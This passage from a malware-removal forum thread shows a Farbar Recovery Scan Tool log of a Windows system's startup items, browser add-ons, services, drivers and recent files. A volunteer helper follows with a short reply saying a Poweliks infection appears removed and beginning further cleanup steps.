HKU\S-1-5-21-3603006954-300617725-3809153182-1000\...\Run: [Raptr] => C:\Program Files (x86)\Raptr\raptrstub.exe [55568 2014-10-17] (Raptr, Inc)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe (McAfee, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WG111v3 Smart Wizard.lnk
ShortcutTarget: NETGEAR WG111v3 Smart Wizard.lnk -> C:\Program Files (x86)\NETGEAR\WG111v3\WG111v3.exe ()
BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.msn.com
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll (McAfee, Inc.)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SearchHelper.dll (Microsoft Corp.)
BHO-x32: Windows Live Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files (x86)\Windows Live\Toolbar\wltcore.dll (Microsoft Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - &Windows Live Toolbar - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - C:\Program Files (x86)\Windows Live\Toolbar\wltcore.dll (Microsoft Corporation)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @esn/npbattlelog,version=2.4.0 -> C:\Program Files (x86)\Battlelog Web Plugins\2.4.0\npbattlelog.dll (EA Digital Illusions CE AB)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\3.0.40624.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8117.0416 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

Chrome:
=======
CHR Profile: C:\Users\Joe\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Joe\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-07-15]
CHR Extension: (YouTube) - C:\Users\Joe\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-08-21]
CHR Extension: (Google Search) - C:\Users\Joe\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-08-21]
CHR Extension: (Google Wallet) - C:\Users\Joe\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-01-25]
CHR Extension: (Gmail) - C:\Users\Joe\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-08-21]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [3364368 2014-09-05] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [293448 2014-09-05] (AVG Technologies CZ, s.r.o.)
S3 Futuremark SystemInfo Service; C:\Program Files (x86)\Common Files\Futuremark Shared\Futuremark SystemInfo\FMSISvc.exe [130976 2011-03-01] (Futuremark Corporation)
S2 IAStorDataMgrSvc; C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology enterprise\IAStorDataMgrSvc.exe [7168 2012-08-07] (Intel Corporation) [File not signed]
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [166720 2012-08-09] (Intel Corporation)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [289256 2014-04-09] (McAfee, Inc.)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [1900400 2014-11-06] (Electronic Arts)
R2 PnkBstrA; C:\Windows\system32\PnkBstrA.exe [76152 2014-08-16] ()
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2014-08-13] ()
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1817560 2013-05-16] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [1033688 2013-05-16] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2013-05-15] (Safer-Networking Ltd.)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [153368 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [247576 2014-07-24] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [190744 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [243480 2014-08-20] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [313624 2014-07-18] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [123672 2014-08-06] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [31512 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [270616 2014-07-02] (AVG Technologies CZ, s.r.o.)
R3 CORSGKB; C:\Windows\System32\drivers\CORSGKB.sys [25600 2012-03-27] ( )
R0 iaStorF; C:\Windows\System32\DRIVERS\iaStorF.sys [26072 2012-08-07] (Intel Corporation)
R3 LGSHidFilt; C:\Windows\System32\DRIVERS\LGSHidFilt.Sys [66800 2013-01-17] (Logitech Inc.)
R3 rusb3hub; C:\Windows\System32\DRIVERS\rusb3hub.sys [114568 2012-08-27] (Renesas Electronics Corporation)
R3 rusb3xhc; C:\Windows\System32\DRIVERS\rusb3xhc.sys [230280 2012-08-27] (Renesas Electronics Corporation)
S3 cpuz135; \??\C:\Windows\TEMP\cpuz135\cpuz135_x64.sys [X]
S3 MSICDSetup; \??\E:\CDriver64.sys [X]
S3 NTIOLib_1_0_C; \??\E:\NTIOLib_X64.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-06 20:01 - 2014-11-06 20:01 - 00001244 _____ () C:\Users\Joe\Desktop\AdwCleaner[S0].txt
2014-11-06 19:59 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-11-06 19:58 - 2014-11-06 19:59 - 00000000 ____D () C:\AdwCleaner
2014-11-06 19:57 - 2014-11-06 19:57 - 01375089 _____ () C:\Users\Joe\Desktop\adwcleaner_3.311.exe
2014-11-06 19:56 - 2014-11-06 19:56 - 00000775 _____ () C:\Users\Joe\Desktop\JRT.txt
2014-11-06 19:54 - 2014-11-06 19:54 - 00000000 ____D () C:\Windows\ERUNT
2014-11-06 19:53 - 2014-11-06 19:53 - 01706939 _____ (Thisisu) C:\Users\Joe\Downloads\JRT.exe
2014-11-06 19:53 - 2014-11-06 19:53 - 01706939 _____ (Thisisu) C:\Users\Joe\Desktop\JRT.exe
2014-11-06 08:11 - 2014-11-06 08:11 - 00030863 _____ () C:\Users\Joe\Desktop\Addition.txt
2014-11-06 08:10 - 2014-11-06 20:02 - 00015152 _____ () C:\Users\Joe\Desktop\FRST.txt
2014-11-06 08:10 - 2014-11-06 20:02 - 00000000 ____D () C:\FRST
2014-11-06 08:09 - 2014-11-06 08:05 - 02114560 _____ (Farbar) C:\Users\Joe\Desktop\FRST64.exe
2014-11-02 16:19 - 2014-11-02 16:19 - 00068680 _____ () C:\Users\Joe\Desktop\Extras.Txt
2014-11-02 16:14 - 2014-11-02 16:14 - 00087596 _____ () C:\Users\Joe\Desktop\OTL.Txt
2014-11-02 16:00 - 2014-11-02 16:19 - 00068680 _____ () C:\Users\Joe\Downloads\Extras.Txt
2014-11-02 15:59 - 2014-11-02 15:59 - 00087596 _____ () C:\Users\Joe\Downloads\OTL.Txt
2014-11-02 15:50 - 2014-11-02 15:50 - 00602112 _____ (OldTimer Tools) C:\Users\Joe\Downloads\OTL.exe
2014-11-02 14:27 - 2014-11-02 14:36 - 217002689 _____ (AGOT TEAM ) C:\Users\Joe\Downloads\CK2-AGOT_setup_0.8.exe
2014-11-02 14:20 - 2014-11-02 14:21 - 00000000 ____D () C:\Users\Joe\Downloads\CK2GOT08
2014-11-02 09:53 - 2014-11-02 09:53 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wot Numbers
2014-11-01 22:33 - 2014-11-01 22:33 - 00000000 ____D () C:\Users\Joe\Documents\Paradox Interactive
2014-11-01 22:00 - 2014-11-01 22:00 - 00000222 _____ () C:\Users\Joe\Desktop\Crusader Kings II.url
2014-11-01 10:01 - 2014-11-02 19:42 - 00000000 ____D () C:\Users\Joe\AppData\Roaming\Wot Numbers
2014-11-01 10:00 - 2014-11-01 10:00 - 00000000 ____D () C:\Users\Joe\Downloads\WotNumbersSetup
2014-10-21 20:16 - 2014-10-21 20:16 - 00000965 _____ () C:\Users\Public\Desktop\AVG 2015.lnk
2014-10-21 20:16 - 2014-10-21 20:16 - 00000000 ____D () C:\Users\Joe\AppData\Roaming\AVG2015
2014-10-21 20:15 - 2014-10-21 20:16 - 00000000 ____D () C:\ProgramData\AVG2015
2014-10-21 20:03 - 2014-11-02 15:07 - 00000000 ____D () C:\Users\Joe\AppData\Local\Avg2015
2014-10-20 08:53 - 2014-10-29 09:56 - 00011264 _____ () C:\Users\Joe\Desktop\Weight 2014.xls
2014-10-19 12:55 - 2014-10-06 19:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-19 12:55 - 2014-10-06 19:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-19 12:55 - 2014-09-28 17:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-19 12:55 - 2014-09-25 15:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-19 12:55 - 2014-09-25 15:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-19 12:55 - 2014-09-25 15:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-19 12:55 - 2014-09-25 15:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-19 12:55 - 2014-09-25 15:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-19 12:55 - 2014-09-25 15:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-19 12:55 - 2014-09-25 15:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-19 12:55 - 2014-09-18 18:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-19 12:55 - 2014-09-18 18:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-19 12:55 - 2014-09-18 18:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-19 12:55 - 2014-09-18 18:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-19 12:55 - 2014-09-18 18:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-19 12:55 - 2014-09-18 18:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-19 12:55 - 2014-09-18 18:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-19 12:55 - 2014-09-18 18:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-19 12:55 - 2014-09-18 18:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-19 12:55 - 2014-09-18 18:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-19 12:55 - 2014-09-18 18:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-19 12:55 - 2014-09-18 18:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-19 12:55 - 2014-09-18 18:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-19 12:55 - 2014-09-18 18:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-19 12:55 - 2014-09-18 18:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-19 12:55 - 2014-09-18 18:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-19 12:55 - 2014-09-18 18:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-19 12:55 - 2014-09-18 18:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-19 12:55 - 2014-09-18 17:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-19 12:55 - 2014-09-18 17:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-19 12:55 - 2014-09-18 17:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-19 12:55 - 2014-09-18 17:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-19 12:55 - 2014-09-18 17:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-19 12:55 - 2014-09-18 17:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-19 12:55 - 2014-09-18 17:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-19 12:55 - 2014-09-18 17:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-19 12:55 - 2014-09-18 17:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-19 12:55 - 2014-09-18 17:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-19 12:55 - 2014-09-18 17:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-19 12:55 - 2014-09-18 17:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-19 12:55 - 2014-09-18 17:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-19 12:55 - 2014-09-18 17:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-19 12:55 - 2014-09-18 17:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-19 12:55 - 2014-09-18 17:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-19 12:55 - 2014-09-18 16:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-19 12:55 - 2014-09-18 16:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-19 12:55 - 2014-09-18 16:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-19 12:55 - 2014-06-18 15:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-19 12:55 - 2014-06-18 15:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-19 12:55 - 2014-06-18 15:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-19 12:55 - 2014-06-18 15:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-19 12:55 - 2014-06-18 15:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-19 12:55 - 2014-06-18 15:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-19 12:54 - 2014-09-18 19:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-19 12:54 - 2014-09-18 18:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-19 12:54 - 2014-09-18 18:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-19 12:54 - 2014-09-18 18:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-19 12:54 - 2014-09-18 18:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-19 12:54 - 2014-09-18 18:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-19 12:54 - 2014-09-18 18:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-19 12:54 - 2014-09-18 18:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-19 12:54 - 2014-09-18 17:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-19 12:54 - 2014-09-18 16:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-19 12:54 - 2014-09-12 18:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-19 12:54 - 2014-09-12 18:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-10-19 12:54 - 2014-09-03 22:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-19 12:54 - 2014-09-03 22:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-19 12:54 - 2014-07-16 19:07 - 03722240 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-19 12:54 - 2014-07-16 19:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-19 12:54 - 2014-07-16 19:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-19 12:54 - 2014-07-16 19:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-19 12:54 - 2014-07-16 19:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-19 12:54 - 2014-07-16 19:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-19 12:54 - 2014-07-16 19:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-19 12:54 - 2014-07-16 19:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-19 12:54 - 2014-07-16 18:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-19 12:54 - 2014-07-16 18:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-19 12:54 - 2014-07-16 18:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-19 12:54 - 2014-07-16 18:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2014-10-19 12:54 - 2014-07-16 18:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-19 12:54 - 2014-07-16 18:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-19 12:54 - 2014-07-16 18:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-19 12:54 - 2014-07-16 18:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-19 12:54 - 2014-05-30 01:08 - 00340992 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2014-10-19 12:54 - 2014-05-30 01:08 - 00314880 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2014-10-19 12:54 - 2014-05-30 01:08 - 00307200 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2014-10-19 12:54 - 2014-05-30 01:08 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2014-10-19 12:54 - 2014-05-30 00:52 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2014-10-19 12:54 - 2014-05-30 00:52 - 00247808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2014-10-19 12:54 - 2014-05-30 00:52 - 00220160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2014-10-19 12:54 - 2014-05-30 00:52 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-06 20:03 - 2013-08-21 15:44 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-11-06 20:01 - 2014-04-19 12:58 - 00000000 ____D () C:\Users\Joe\AppData\Roaming\Raptr
2014-11-06 20:01 - 2013-08-21 21:36 - 00000000 ____D () C:\Program Files (x86)\Origin
2014-11-06 20:01 - 2013-08-21 15:52 - 00000000 ____D () C:\Program Files (x86)\Steam
2014-11-06 20:01 - 2013-08-21 15:44 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-11-06 20:01 - 2011-06-29 11:51 - 00044418 _____ () C:\Windows\setupact.log
2014-11-06 20:01 - 2010-11-20 20:47 - 00288618 _____ () C:\Windows\PFRO.log
2014-11-06 20:01 - 2009-07-13 22:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-06 20:00 - 2013-08-16 16:54 - 01126615 _____ () C:\Windows\WindowsUpdate.log
2014-11-06 19:56 - 2009-07-13 21:45 - 00025632 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-06 19:56 - 2009-07-13 21:45 - 00025632 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-06 19:55 - 2009-07-13 22:13 - 00784286 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-06 19:49 - 2013-08-21 21:36 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2014-11-06 19:44 - 2013-08-21 15:23 - 00000000 ____D () C:\ProgramData\MFAData
2014-11-06 19:34 - 2013-09-15 21:05 - 00000370 _____ () C:\Windows\Tasks\WpsUpdateTask_Joe.job
2014-11-06 19:34 - 2013-09-14 09:02 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-06 19:34 - 2013-08-21 21:36 - 00000000 ____D () C:\ProgramData\Origin
2014-11-02 19:02 - 2013-08-30 17:02 - 00000000 ____D () C:\Users\Joe\AppData\Roaming\ActiveDossierUploader
2014-11-02 15:09 - 2013-08-21 15:04 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 2
2014-11-02 09:43 - 2013-08-21 19:50 - 00000000 ____D () C:\Users\Joe\AppData\Roaming\TS3Client
2014-11-01 23:49 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\rescache
2014-10-27 20:58 - 2013-08-21 15:44 - 00002183 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-21 20:17 - 2013-08-21 15:25 - 00000000 ____D () C:\Program Files (x86)\AVG
2014-10-21 20:16 - 2014-03-31 15:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2014-10-21 20:16 - 2013-08-21 15:25 - 00000000 ___HD () C:\$AVG
2014-10-21 06:58 - 2013-08-21 15:44 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-21 06:58 - 2013-08-21 15:44 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-20 03:21 - 2009-07-13 21:45 - 00266992 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-20 03:01 - 2013-08-25 00:01 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-20 03:00 - 2013-08-25 00:01 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-19 12:49 - 2014-04-19 12:58 - 00000000 ____D () C:\Program Files (x86)\Raptr

Some content of TEMP:
====================
C:\Users\Joe\AppData\Local\Temp\Quarantine.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-09-13 18:35

==================== End Of Log ============================


  • 0

#10
pystryker

pystryker

    Trusted Helper

  • Malware Removal
  • 3,912 posts
Excellent, no signs of the Poweliks infection in the fresh FRST log. Let's run some scans for any remnants. How is the machine running? :thumbsup:

Please disable your antivirus for the duration of my instructions. Don't forget to re-enable them after you have completed the steps.


Step 1: Scan with Malwarebytes


